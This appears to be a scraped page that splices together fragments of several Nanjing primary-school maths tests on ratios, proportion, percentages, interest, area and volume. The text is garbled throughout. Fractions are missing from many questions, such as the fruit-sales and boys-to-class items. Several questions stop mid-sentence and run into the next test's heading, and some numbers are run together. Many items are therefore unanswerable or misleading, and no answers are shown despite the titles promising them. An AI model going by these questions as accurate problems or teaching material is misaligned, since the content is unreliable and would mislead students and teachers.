20.一堆水果第一天卖了,第二天卖了.已知第一天卖了20吨,第二天卖了多少吨?
南京市小学数学六年级上册第四单元《比》测试题(包含答案解析)
南京市小学数学六年级上册第四单元《比》测试题(包含答案解析) 一、选择题 1.与0.25:0.45比值相等的比是() A. 2.5:45 B. 5:0.9 C. 1:1 D. 5:9 2.天安门广场上的国旗长495cm,宽330cm,长和宽的最简整数比是() A. 2:3 B. 3:2 C. 495:330 3.学校里有篮球、足球、排球共180个,已知篮球、足球、排球的比是5:4:3,足球有()个. A. 75 B. 60 C. 45 4.林场中,杨树的棵数比柏树少20%,柏树和杨树的比是()。 A. 4:5 B. 5:4 C. 1:2 D. 1:5 5.某工厂甲车间人数是乙车间人数的5倍,甲车间男工人数是女工人数的倍,乙车间男 工人数是女工人数的,全长工人中男工人数和女工人数的比是()。 A. 3:4 B. 7:9 C. 4:3 6.男生人数占全班人数的,这个班的男、女生人数之比是()。 A. 1∶3 B. 2∶3 C. 1∶2 D. 1∶4 7.已知b:2= (b,c均不为0),那么b,c的大小关系是() A. b>c B. b 小学六年级数学毕业水平测试卷 2008.3 班级____ 姓名_____ 成绩___ 一、填空。(19%) 1、我国自行研制的“嫦娥一号”(Chang'E1)月球探测卫星于2007年10月24日18时05分胜利发射升空,经过第四次变轨,顺利进入地月转移轨道,开始飞向距地球约380000千米的月球。将划线部分数字改写成以万作单位的数是( )万千米。 2、1.05立方分米=( )立方厘米 24 3小时=( )小时( )分 3、小明把36-12+8错算成36-(12+8),这样算出的结果与正确的结果相差( )。 4、在照片上姚明的身高是5厘米,他的实际身高是2.29米。这张照片的比例尺是( )。 5、学校把植树180棵的任务交给五年级(1)班、五(2)班两个班。五(1)班46人,五(2)班44人,请你合理分配,五(2)应植树( )棵。 6、在13 、33.3%、310 、3.3中,最大的是( ),最小的是( )。 7、100克的黄豆可以榨油35克,照这样计算,要榨油70吨,需要黄豆( )吨;如果有45吨黄豆,可以榨油( )吨。 8、某绿化队要栽种一批树苗,这批树苗的成活率是75%~90%。如果要保证栽活900棵树苗,至少要栽种( )棵树苗。 9、一串数按1,1,2,2,3,3,4,4,5,5,……从左面第一个数起,第35个数是( ),前35个数中共有( )个奇数。 10、把4个棱长为1分米的正方体摆成一个长方体,它的表面积可能是( )平方分米或( )平方分米。 11、计划要用10天完成一项工作,实际每天的工作效率提高了25%,实际用了( )天。 12、右图中长方形面积与圆的面积相等。长方形的长是10厘米,圆的半径是( )厘米。 13、一项工程,甲独修要10完成,乙独修要15天完成。两队先合修3天后,乙完成了这项工程的( ),比甲队少( )。 二、判断。(5%) ( )1、比的前项一定,后项与比值成反比例。 ( )2、真分数的倒数一定是假分数,假分数的倒数不一定是真分数。 ( )3、5吨煤平均分成6份,每份是1吨的56 。 ( )4、小李做100个零件,合格率是95%,再做2个合格零件,合格率就达到了97% 。 ( )5、一个长方形按3:1放大,它的面积就扩大9倍。 三、选择。(4%) 1、甲、乙两数的比是5:4,乙数比甲数少__________。 ① 25% ② 20% ③ 125% 2、长方体体积一定,底面积和高__________。 ① 成正比例 ② 成反比例 ③ 不成比例 3、右图是一个半圆,求它的周长的正确算式是_________。 ① 3.14×1522 ② 3.14×(15×2)2 +15 ③3.14×15+15×2 4、a 、b 、c 是三个大于零的自然数,它们的平均数是16,并且a 2020年南京市小学六年级数学下期末模拟试卷及答案 一、选择题 1.下面几组相关联的量中,成反比例的是()。 A. 小明从学校走路回家,已走的路程和剩下的路程 B. 圆柱的体积一定,它的底面积和高 C. 圆的周长和它的直径 2.小李正在看一本故事书,已经看的页数和还没有看的页数,会是下面的()关系。A. 成正比例 B. 成反比例 C. 不成比例 D. 无法3.如果4m=3n,那么m与n()。 A. 成正比例 B. 成反比例 C. 不成比例 4.把一个圆柱铸成一个圆锥体,它的()不变。 A. 体积 B. 表面积 C. 侧面积 5.圆柱的底面半径和高都乘3,它的体积应乘() A. 3 B. 6 C. 27 6.一个圆柱形无盖水桶,它的底面直径是6分米,高是5分米,要做一个这样的水桶,至少需要()平方分米的铁皮。 A. 122.46 B. 94.2 C. 565.2 7.李明准备将2000元压岁钱按年利率2.75%存入银行,存期为3年,到期他可以从银行取回多少钱,列式正确的是()。 A. 2000×2.75%×3 B. 2000×2.75%×3+2000 C. 2000×2.75%+2000 8.甲商品的价格打九折后与乙商品价格相等。下列说法不正确的是()。 A. 乙商品的价格是甲商品的90% B. 甲商品的价格比乙商品高10% C. 乙商品的价格比甲商品低10% D. 甲商品的价格是乙商品的倍 9.一件商品按五五折出售就是说现价()。 A. 比原价降低55% B. 是原价的5.5% C. 是原价的45% D. 是原价的55% 10.下表是一月份我国几个城市的平均气温,其中平均气温最低的城市是()。 城市名称北京长沙广州宜昌 平均气温(℃)-2.7 2.88.20 广州 D. 宜昌11.在直线上,-2在-1的()边。 A. 左 B. 右 C. 可左也可右 D. 无法确定12.一种饼干的包装袋上标着:净重(150±5g)表示这种饼干标准质量是150g,实际每袋最少不小于()g。 A. 155 B. 150 C. 145 D. 140 二、填空题 13.如果x÷y=42÷3.5,那么x和y成________比例关系;如果m:1.2=1.5:n,那么m 小学六年级数学期末测试卷 2019.01 一、计算题。(26分) 1.直接写出下列各题的结果。(8分) 15×53= 65+21= 95-31= 103×12 5= 94×56= 41÷89= 2411÷22= 1÷85×8 5= 2.解方程。(6分) X +60%X =96 32X -54=516 3.下面各题,怎样算简便就怎样算。(12分) 65×(56+12) 2619÷98+267×8 9 ( 2417-31)×53÷43 710÷[149×(94+6 1)] 二、填空题。(每空1分,共25分) 1. 32米的电线用去41,用去( )米,6吨减少4 1吨后是( )吨。 2.在○里填上“>”“<”或“=” 52×89 89 16×1110 16+1110 127×97 127÷9 7 3.某商品打八折出售就是降价( )%出售。 4.一本故事书有120页,小明第一天读了全书的6 1,第二天读了全书的25%,第三天应从第( )页读起。 5.把体积是1立方分米的正方体木块,切割成体积是1立方厘米的小正方体,能切成( )块。把这些小正方体一个挨一个排成一行,有( )米长。 6.一个直角三角形两个锐角的度数比是3:2,这两个锐角分别是( )度和( )度。 7.某服装厂去年销售服装的收入总额是800万元,按规定应缴纳17%的增值税共要缴纳增值税( )万元。 8.一辆汽车行驶23千米需要汽油8 1升,这辆汽车行驶1千米耗油( )升,1升油可以行驶( )千米。 9.用一根长50厘米的铁丝,做成一个长6厘米,宽4厘米,高2厘米的长方体框架后(接头忽略不计),还剩( )厘米。如果用白纸贴满长方体的各个面,至少需要用白纸( )平方厘米。 2020-2021南京市小学六年级数学下期中第一次模拟试卷(附答案) 一、选择题 1.3毫米精密零件画在图纸上是30厘米,图纸比例尺是() A. 1:10 B. 1:100 C. 10:1 D. 100:1 2.下面根据A×B=1×8写出的比例中,正确的是()。 A. A∶8=B∶1 B. A∶B=8∶1 C. 8∶A=B∶1 D. 8∶B=1∶A 3.如果4m=3n,那么m与n()。 A. 成正比例 B. 成反比例 C. 不成比例 4.如图是一个直角三角形,两条直角边分别是6cm和2cm,以较长边为轴,旋转一周所形成的立体图形的体积是()立方厘米. A. 25.12 B. 12.56 C. 75.36 5.用一根小棒粘住长方形一条边,旋转一周,这个长方形转动后产生的图形是() A. 三角形 B. 圆形 C. 圆柱 6.圆柱形水泥柱高4米,一根长31.4米的绳子正好能沿水泥柱绕10圈,这根水泥柱的体积是()立方米。 A. 3.14 B. 12.56 C. 314 D. 125.6 7.李明准备将2000元压岁钱按年利率2.75%存入银行,存期为3年,到期他可以从银行取回多少钱,列式正确的是()。 A. 2000×2.75%×3 B. 2000×2.75%×3+2000 C. 2000×2.75%+2000 8.王老师把4000元存入银行,定期3年,年利率是4.50%,到期一共可以取回()元. A. 540 B. 4540 C. 4432 9.一种电视机原价1800元,现价是1440元,现在是打()折出售的。 A. 八 B. 二 C. 九 10.在直线上,-2在-1的()边。 A. 左 B. 右 C. 可左也可右 D. 无法确定11.在-4,-9,-,-0.1这些数中,最大的数是()。 A. -4 B. -9 C. - D. -0.1 12.下表记录了某日我国几个城市的气温,气温最高的是()。 北京西安沈阳兰州 南京市鼓楼区小学五年级数学上册期末测试卷 (总分100分,80分钟完成) 2018.01 一、填空题(27%,每空1分,第2小题2分) 1.(1)在数位顺序表中,小数点左边第二位是( )位,右边第二位是()位。 (2)35.68中的“6”表示6个( )。 2.计算4.2÷0.35时,先将除数和被除数的小数点同时向( )移动()位,转化成( )÷( )后再计算。 3.第六次人口普查显示,我国共有人口1339720000人,将横线上的数改写成以“亿”作单位的数是()亿,将改写后的数保留两位小数约是()亿。 4.小薇买4枝钢笔,每支a元;买5本练习本,每本b元,一共付出的钱可用式子()来表示;当a=4.5,b=2.2时,一共应付出()元。 5.小明测得南京某天几个不同时刻的气温。根据表中的数据完成下面的填空 表中的最低气温是( )℃,从上午10时到下午2时,气温上升了()℃。 6.在O里填上“>”、“<”或“=” 0.6○0.56 1.43÷0.99○1.43 0.4×10○0.4÷0.1 7.1.25公顷=( )平方米7000公顷=()平方千米 8.在括号里填合适的面积单位。 (1)一本书封面的面积大约是300(); (2)南京玄武湖占地面积大约是470( )。 9.()个0.01是1,2连续减去()个0.25得0. 10. 与右图等底等高的三角形面积是( )平方米。 11.如右图,一个平行四边形被分成了一个正方形和两个等腰直角 三角形,如果正方形的面积是10平方厘米,那么一个三角形的 面积是()平方厘米,平行四边形的面积是( )平方厘米。 12.小丽在计算3.68加一个一位小数时,由于错误的把数的末尾对齐,结果得到了4.25,正确的得数应是()。 13.如图,长方形被分成了一个三角形和一个梯形。已知三角形的面积 比梯形少180平方厘米。那么图中三角形的面积是()平方厘 米。 14.一张靶纸共三圈,投中内圈得10环,投中中圈得8环,投中外圈得6环(如下图)。小华投中2次,环数之和可能有( )种。 15.如右图,梯形的面积是( )平方分米。 二、选择题(选择正确答案的序号填在括号中。)(8%,每小题2分) 1.在下列各个温度中,最接近0°C的是() A.-2℃ B.-3℃ C.+3℃ 2.x2和2x的大小关系,下列表述正确的是() A.一定相等 B.一定不相等 C.可能相等 3.三角形与平行四边形面积相等,底也相等,如果三角形的高是8分米,那么平行四边形的高是()南京市长江路小学六年级毕业数学试卷
2020年南京市小学六年级数学下期末模拟试卷及答案
南京市2018-2019学年第一学期期末考试六年级数学试卷
2020-2021南京市小学六年级数学下期中第一次模拟试卷(附答案)
2018.1南京市鼓楼区小学五年级数学上册期末测试卷含答案